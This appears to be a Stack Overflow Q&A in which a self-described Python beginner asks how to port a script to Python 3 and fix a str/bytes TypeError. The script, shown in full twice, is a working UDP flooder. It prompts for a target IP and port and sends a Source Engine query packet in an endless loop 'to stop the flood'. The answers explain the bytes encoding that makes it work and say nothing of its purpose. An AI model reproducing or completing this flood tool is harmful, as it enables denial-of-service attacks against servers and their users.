# TypeError: 'str' does not support the buffer interface 4

Tags: python, python-3.x, buffer

This is code written in Python 2.x, I want to make it run in Python 3.x.

What would this line look like to work in Python 3.x?

```
while True:
    sock.sendto(bytes,(ip,port))
```

Note: I never used Python before today, so don't shoot me if this is a stupid question for you.

---

Here's the entire code, what should it look like to work in Python 3?

```
import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = '\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x00'

ip = input("Target IP: ")
port = input("Target Port: ")

print ("Exit the program to stop the flood")

while True:
    sock.sendto(bytes,(ip,port))
```

Comment: What is the type of `bytes`, can you show some more code?

Comment: Given the title, which is probably the error message, I suppose it's a `str`.

Comment: import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = '\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x00'

ip = input("Target IP: ")
port = input("Target Port: ")

print ("Exit the program to stop the flood")

while True:
 sock.sendto(bytes,(ip,port))

Answer (score 2):

The code is exactly the same in Python 3.

The difference is that `str` type represents Unicode string in Python 3. `str` was a bytestring in Python 2.

Convert `bytes` to be `bytes` e.g., `s.encode(encoding)`.  Also rename `bytes` to avoid confusion with the builtin name `bytes`.

Answer (score 1):

Most likely `bytes` is a str, which means it is a collection of characters. Over the network, you cannot send characters, but only bytes. Characters can be encoded into a byte stream in several ways. You most probably want to use utf-8 for it. You can encode a str into a bytes object using `the_string.encode ('utf-8')`. This bytes object can be sent over the network.